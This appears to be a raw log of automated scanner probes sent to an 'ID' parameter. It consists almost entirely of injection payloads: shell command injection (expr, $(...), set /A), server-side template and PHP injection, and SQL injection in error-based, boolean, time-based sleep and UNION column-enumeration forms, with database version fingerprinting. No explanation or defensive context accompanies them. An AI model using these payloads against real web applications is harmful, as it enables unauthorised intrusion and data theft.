ID:12
ID:12
expr 803275073 + 829756568

ID:12|expr 935384022 + 818330322 
ID:12$(expr 945853398 + 815054990)
ID:12&set /A 866228242+898224268
ID:${@var_dump(md5(923985186))};
ID:'-var_dump(md5(259061441))-'
ID:/*1*/{{936906882+854626018}}
ID:${878480209+964341006}
ID:${(879941559+882496513)?c}
ID:#set($c=873029463+841843308)${c}$c
ID:<%- 914771619+946260322 %>
ID:12
ID:12
ID:12
ID:12'and/**/extractvalue(1,concat(char(126),md5(1421033295)))and'
ID:12"and/**/extractvalue(1,concat(char(126),md5(1157914246)))and"
ID:extractvalue(1,concat(char(126),md5(1808595844)))
ID:12'and(select'1'from/**/cast(md5(1242163017)as/**/int))>'0
ID:12/**/and/**/cast(md5('1482993042')as/**/int)>0
ID:convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1896860517')))
ID:12'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1389592735')))>'0
ID:12鎈'"\(
ID:12/**/and+3=3
ID:12/**/and+0=8
ID:12'and'k'='k
ID:12'and'y'='u
ID:12"and"z"="z
ID:12"and"h"="t
ID:12
ID:12
ID:12
ID:(select*from(select+sleep(0)union/**/select+1)a)
ID:(select*from(select+sleep(2)union/**/select+1)a)
ID:12'and(select*from(select+sleep(0))a/**/union/**/select+1)='
ID:12'and(select*from(select+sleep(2))a/**/union/**/select+1)='
ID:12'and(select*from(select+sleep(3))a/**/union/**/select+1)='
ID:suahgxwpsgdfxuxdvwtr
ID:12 and 1=1
ID:12 and 1=2
ID:1
ID:1
ID:1
ID:1
ID:8419
ID:1').().",,.
ID:2805-2804
ID:1.1iWIi
ID:1'LDMdKk<'">UvfJjN
ID:1) AND 1173=8030 AND (6028=6028
ID:1) AND 1170=1170 AND (4043=4043
ID:1 AND 9318=5741
ID:1 AND 1170=1170
ID:1 AND 9228=6361-- CRxR
ID:1 AND 1170=1170-- JKGl
ID:1') AND 9276=4845 AND ('jMpW'='jMpW
ID:1') AND 1170=1170 AND ('NEwA'='NEwA
ID:1') AND 5536=9889 AND ('DfJu'='DfJu
ID:(SELECT CONCAT(CONCAT(0x7178787071,(CASE WHEN (2134=2134) THEN 0x31 ELSE 0x30 END)),0x717a707a71))
ID:1') AND (SELECT 1968 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(1968=1968,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('ibEL'='ibEL
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1') AND (SELECT 4434 FROM (SELECT(SLEEP(5)))ZvUR) AND ('ewwM'='ewwM
ID:1') AND (SELECT 4434 FROM (SELECT(SLEEP(0)))ZvUR) AND ('ewwM'='ewwM
ID:1') AND (SELECT 4434 FROM (SELECT(SLEEP(5)))ZvUR) AND ('ewwM'='ewwM
ID:1') ORDER BY 1-- -
ID:1') ORDER BY 3867-- -
ID:1') ORDER BY 10-- -
ID:1') ORDER BY 6-- -
ID:1') ORDER BY 4-- -
ID:1') ORDER BY 3-- -
ID:1') UNION ALL SELECT CONCAT(0x7178787071,0x63537a64574b54756d49694f426654504941516b656c67476955735a6141654c68614c6543484e66,0x717a707a71),NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,CONCAT(0x7178787071,0x624a7a6d504374627662747a62574750535a54767356536954444154586f51526843516d79666d48,0x717a707a71)-- -
ID:1') UNION ALL SELECT NULL,CONCAT(0x7178787071,0x7a516c4d4971666f436c48454d615a636759426a736345524e6a4a506c546f4e4e69777879584454,0x717a707a71),NULL-- -
ID:1') UNION ALL SELECT CONCAT(0x7178787071,0x594b4172557065526773,0x717a707a71),NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,CONCAT(0x7178787071,0x6e484850664e79416a61,0x717a707a71)-- -
ID:1') UNION ALL SELECT NULL,CONCAT(0x7178787071,0x4572646d7a627974474f,0x717a707a71),NULL-- -
ID:-4530') UNION ALL SELECT CONCAT(0x7178787071,0x4474656e57624b594355514b79785977577966534a56576a6c794a56466d47655759414654634f65,0x717a707a71),NULL,NULL-- -
ID:-2159') UNION ALL SELECT NULL,NULL,CONCAT(0x7178787071,0x634164484b69774c6c7545775459695761474d686968625663516267764c666d5351774d76596349,0x717a707a71)-- -
ID:-4900') UNION ALL SELECT NULL,NULL,CONCAT(0x7178787071,(CASE WHEN (1861=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1861) THEN 1 ELSE 0 END),0x717a707a71)-- -
ID:-9955') UNION ALL SELECT NULL,NULL,CONCAT(0x7178787071,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x717a707a71)-- -
ID:-4310') UNION ALL SELECT NULL,NULL,CONCAT(0x7178787071,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x717a707a71)-- -
ID:-5100') UNION ALL SELECT NULL,NULL,CONCAT(0x7178787071,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x717a707a71)-- -
ID:-6358') UNION ALL SELECT NULL,NULL,CONCAT(0x7178787071,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x717a707a71)-- -
ID:-9318') UNION ALL SELECT NULL,NULL,CONCAT(0x7178787071,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x717a707a71)-- -
ID:1
ID:1
